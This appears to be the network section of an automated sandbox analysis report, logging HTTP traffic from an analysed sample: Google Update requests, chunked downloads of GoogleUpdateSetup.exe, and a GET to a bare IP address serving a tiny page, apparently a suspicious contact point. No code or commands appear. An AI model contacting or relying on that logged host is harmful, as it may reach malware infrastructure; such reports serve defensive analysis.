X-Daystart: 76959
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST
200
https://update.googleapis.com/service/update2
REQUEST
RESPONSE
BODY
POST /service/update2 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Google Update/1.3.36.72;winhttp
X-Old-UID: cnt=0
X-Goog-Update-Updater: Omaha-1.3.36.72
X-Goog-Update-Interactivity: bg
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Content-Length: 785
Host: update.googleapis.com
HTTP/1.1 200 OK
Content-Security-Policy: script-src 'report-sample' 'nonce-Lj5ORRH/+PCHe7uGKAJ+QA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Apr 2021 04:22:47 GMT
Content-Type: text/xml; charset=UTF-8
X-Daynum: 5207
X-Daystart: 76967
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET
200
http://203.159.80.228/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
Host: 203.159.80.228
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:21:19 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.2
Last-Modified: Tue, 30 Mar 2021 16:04:04 GMT
ETag: "1f-5bec325bb5626"
Accept-Ranges: bytes
Content-Length: 31
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
HEAD
200
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
HEAD /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 200 OK
accept-ranges: bytes
content-disposition: attachment
content-length: 1304160
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3117
cache-control: public,max-age=3600
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=0-4813
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 4814
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3142
content-range: bytes 0-4813/1304160
cache-control: public,max-age=3600
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=4814-18412
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 13599
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3149
content-range: bytes 4814-18412/1304160
cache-control: public,max-age=3600
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=18413-29842
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 11430
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3157
content-range: bytes 18413-29842/1304160
cache-control: public,max-age=3600
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=29843-41274
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 11432
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3162
content-range: bytes 29843-41274/1304160
cache-control: public,max-age=3600
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=41275-51227
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 9953
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3176
content-range: bytes 41275-51227/1304160
cache-control: public,max-age=3600
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=51228-67422
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 16195
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3177
content-range: bytes 51228-67422/1304160
cache-control: public,max-age=3600
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=67423-88386
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 20964
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3178
content-range: bytes 67423-88386/1304160
cache-control: public,max-age=3600
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=88387-151561
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 63175
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3179
content-range: bytes 88387-151561/1304160
cache-control: public,max-age=3600
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=151562-283433
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 131872
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3180
content-range: bytes 151562-283433/1304160
cache-control: public,max-age=3600
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=283434-544245
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 260812
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3181
content-range: bytes 283434-544245/1304160
cache-control: public,max-age=3600
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=544246-1064661
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 520416
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3182
content-range: bytes 544246-1064661/1304160
cache-control: public,max-age=3600
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=1064662-1304159
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 239498
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3183
content-range: bytes 1064662-1304159/1304160
cache-control: public,max-age=3600
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts